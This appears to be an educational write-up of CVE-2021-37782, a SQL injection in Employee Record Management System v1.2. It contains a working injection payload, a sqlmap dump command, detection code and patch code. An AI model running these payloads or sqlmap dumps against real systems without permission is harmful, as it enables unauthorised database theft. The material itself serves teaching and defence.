Data security is a top concern for every business: one small flaw can let an attacker read an entire database. This article looks at CVE-2021-37782, a SQL injection vulnerability in Employee Record Management System v1.2. It explains what the flaw is, why it is dangerous, and walks through, step by step, how an attacker could exploit it.
> Disclaimer: This content is for educational purposes only. Never exploit vulnerabilities without permission.
## About Employee Record Management System v1.2
The Employee Record Management System (ERMS) is a web-based application for organizing staff information in small businesses. The vulnerability discussed here affects version 1.2.
## What is SQL Injection?
SQL injection happens when user-controlled input is pasted into a SQL statement as text, so the database ends up executing the attacker's input as part of the query. Depending on the query and the privileges of the database account, this can lead to:
- reading data the user should never see (other employees' records, credentials)
- changing or deleting records
- in the worst case, taking over the whole database
## CVE-2021-37782 Explained
CVE-2021-37782 is a SQL injection vulnerability in editempprofile.php, part of ERMS v1.2. The script passes a request parameter into a SQL query without validating it, so an attacker can tamper with that parameter to inject SQL. In practice this means reading or changing employee records, and potentially taking over the entire database.
## How Does The Vulnerability Work?
editempprofile.php is supposed to load and update a single employee's profile. It takes the record ID from the request and places it into the SQL query without checking that it is a number or escaping it, which is exactly what an injection needs.
### 1. The Vulnerable Code
Consider the following (simplified) PHP code inside editempprofile.php:
```php
<?php
// ... session and DB code above ...
$empid = $_GET['id']; // ID comes straight from the URL, untouched
// The raw value is interpolated into the SQL string: a quote in $empid
// closes the literal and whatever follows is interpreted as SQL.
$query = "SELECT * FROM employees WHERE id = '$empid'";
$result = mysqli_query($conn, $query);
// ... rest of the code ...
?>
```
Notice how $empid comes straight from user input and is placed directly in the SQL query, with no validation and no escaping.
### 2. The Attack
A normal request looks like this:
```
http://example.com/editempprofile.php?id=1
```
The attacker changes `1` to `1' OR '1'='1' -- ` (note the trailing space after `--`; MySQL only treats `--` as a comment when it is followed by whitespace). URL-encoded, the request becomes:
```
http://example.com/editempprofile.php?id=1'%20OR%20'1'%3D'1'%20--%20
```
Once the value is dropped into the query string, the database executes:
```sql
SELECT * FROM employees WHERE id = '1' OR '1'='1' -- '
```
- The first quote in the payload closes the `'1'` literal, and `'1'='1'` is always true, so the database returns ALL employee records.
- The `-- ` comments out the trailing `'` that the original code appends, so the statement stays syntactically valid and no error is raised.
### 3. Possible Results
The attacker may:
- See private info of *all* employees
- Exfiltrate passwords, emails, and other sensitive data
---
## Exploit Proof-of-Concept (PoC)
Automated tools like sqlmap can make exploitation trivial. Here's a basic run against the vulnerable parameter:
```bash
sqlmap -u "http://example.com/editempprofile.php?id=1" --risk=3 --level=5 --dump
```
`--level=5` enables sqlmap's full set of test payloads and injection points, `--risk=3` adds its more aggressive tests (including OR-based ones, which can modify data if the injection lands in an UPDATE or DELETE statement, so use it only where you are permitted to take that risk), and `--dump` extracts the contents of the tables sqlmap can reach in the current database.
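The flip side of automated exploitation is spotting it in your own logs. The following is an added example, not code from the original article or from ERMS, written in Python rather than PHP: an allow-list check over web-server access-log lines that flags any request to editempprofile.php whose `id` parameter is not a plain positive integer. Because the script only ever expects a numeric id, this catches the article's payload and an automated scanner's probes alike, without a signature for each one. The log lines are constructed samples in Apache combined format; the `sqlmap/1.6` user agent and the `1' AND '1'='2` probe are assumptions about what an automated run might look like, not captured traffic.

```python
"""Added example, not from the original article: an allow-list check over
web-server access-log lines that flags requests to editempprofile.php whose
`id` parameter is not a plain positive integer. The log lines below are
constructed samples; the `sqlmap/1.6` user agent and the `1' AND '1'='2`
probe are assumptions about an automated run, not captured traffic."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [28/Oct/2022:15:01:12 +0000] "GET /editempprofile.php?id=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Oct/2022:15:02:40 +0000] "GET /editempprofile.php?id=1'%20OR%20'1'%3D'1'%20--%20 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Oct/2022:15:02:41 +0000] "GET /editempprofile.php?id=1'%20AND%20'1'%3D'2 HTTP/1.1" 200 402 "-" "sqlmap/1.6"
203.0.113.5 - - [28/Oct/2022:15:03:05 +0000] "GET /index.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Oct/2022:15:03:19 +0000] "GET /editempprofile.php?id=42 HTTP/1.1" 200 815 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method and request target from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)'
)


def decode_param(raw: str) -> str:
    """parse_qs already percent-decodes once; decoding a second time exposes
    double-encoded payloads such as %2527 (-> %27 -> ')."""
    return unquote(raw)


def suspicious_requests(log_text: str, script: str = "/editempprofile.php", param: str = "id") -> list:
    """Return (ip, timestamp, decoded_value) for every request to `script`
    whose `param` value is anything other than a positive integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m is None:
            continue  # not a request line we understand
        parts = urlsplit(m["target"])
        if parts.path != script:
            continue  # only the vulnerable script is of interest here
        # keep_blank_values so that an empty `id=` is also reported
        for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            value = decode_param(raw)
            if not value.isdigit():
                hits.append((m["ip"], m["ts"], value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} id={value!r}")
```

Run against the sample, only the two requests from 203.0.113.9 are reported; the numeric ids and the unrelated index.php request pass. The same allow-list idea (reject anything that is not what the parameter is supposed to be) is also the right shape for the fix on the server side.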
---
## How To Fix (Patch Guidance)
The best way to prevent SQL injection is to use prepared statements (parameterized queries): the SQL text is sent to the database separately from the value, so the value is never parsed as SQL. Here's a secure version of the lookup using MySQLi, with the id validated as a positive integer before it reaches the query:
```php
<?php
// ... session and DB code above ...
// Validate first: the id must be a positive integer, anything else is rejected.
$empid = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($empid === false || $empid === null) {
    http_response_code(400);
    exit('Invalid employee id');
}
$stmt = $conn->prepare("SELECT * FROM employees WHERE id = ?");
$stmt->bind_param("i", $empid); // 'i' binds the value as an integer
$stmt->execute();
$result = $stmt->get_result();
// ... rest of the code ...
?>
```
Prepared statements close the injection. They do not, on their own, decide who may view or edit a given record, so the script must still check that the logged-in session is authorized for that employee id before running the query.
Never trust raw input in SQL queries!
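To see the difference between the two query styles without a web server or MySQL, here is an added example (not code from the original article or from ERMS, and in Python rather than PHP) that serves both the attack walkthrough above and this fix: it re-creates the string-built query from editempprofile.php against an in-memory SQLite database, feeds it the article's payload, and runs the same lookup as a parameterized query. The `employees` table layout and the sample rows are constructed for illustration.

```python
"""Added example, not code from the original article or from ERMS: the
string-built query from editempprofile.php re-created in Python against an
in-memory SQLite database, next to the parameterized version from the fix.
The table layout and the sample rows are constructed for illustration."""
import sqlite3

# Constructed stand-in for the `employees` table.
SAMPLE_EMPLOYEES = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]

# The article's payload as the script sees it after URL decoding
# (`1'%20OR%20'1'%3D'1'%20--%20`); the trailing space matters for `--`.
INJECTION_PAYLOAD = "1' OR '1'='1' -- "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE employees (id INTEGER PRIMARY KEY, name TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO employees VALUES (?, ?, ?)", SAMPLE_EMPLOYEES)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, empid: str) -> list:
    """Mirrors `"SELECT * FROM employees WHERE id = '$empid'"`: the raw
    parameter becomes part of the SQL text, so a quote inside it closes
    the literal and everything after it is executed as SQL."""
    query = f"SELECT * FROM employees WHERE id = '{empid}'"
    return conn.execute(query).fetchall()


def parameterized_lookup(conn: sqlite3.Connection, empid: str) -> list:
    """Mirrors the prepared-statement fix: the SQL text is fixed and the
    value travels separately as a bound parameter, so quotes and comment
    markers in it are just characters compared against the id column."""
    return conn.execute("SELECT * FROM employees WHERE id = ?", (empid,)).fetchall()


def validate_id(empid: str):
    """The up-front check the fix's integer binding implies: only a
    positive integer is an acceptable id. Returns the int, or None."""
    return int(empid) if empid.isdigit() and int(empid) > 0 else None


def demo() -> dict:
    """Run both lookups with a normal id and with the payload; returns the
    row count of each call so the difference is easy to compare."""
    conn = make_db()
    return {
        "vulnerable/normal": len(vulnerable_lookup(conn, "1")),
        "vulnerable/payload": len(vulnerable_lookup(conn, INJECTION_PAYLOAD)),
        "parameterized/normal": len(parameterized_lookup(conn, "1")),
        "parameterized/payload": len(parameterized_lookup(conn, INJECTION_PAYLOAD)),
        "validate_id(payload)": validate_id(INJECTION_PAYLOAD),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

With the payload, the vulnerable lookup returns every row in the table, while the parameterized lookup returns nothing: the database compares the id column against the literal text `1' OR '1'='1' -- ` and finds no match. The validation step rejects the payload before any query runs, which is the behaviour you want on a real endpoint.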
---
## References
- CVE-2021-37782 - NVD
- Packet Storm Write-up
- OWASP SQL Injection
- sqlmap - Automated SQL Injection Tool
---
## Conclusion
CVE-2021-37782 is a classic case of why untrusted input must never be concatenated into a SQL query. If you run Employee Record Management System v1.2, update or patch your installation now. SQL injection is one of the oldest tricks in the book, and still one of the most dangerous.
Stay safe and keep your company's data secure!
---
Author:
*Cybersecurity Educator @ ChatGPT*
Timeline
Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:33:00 UTC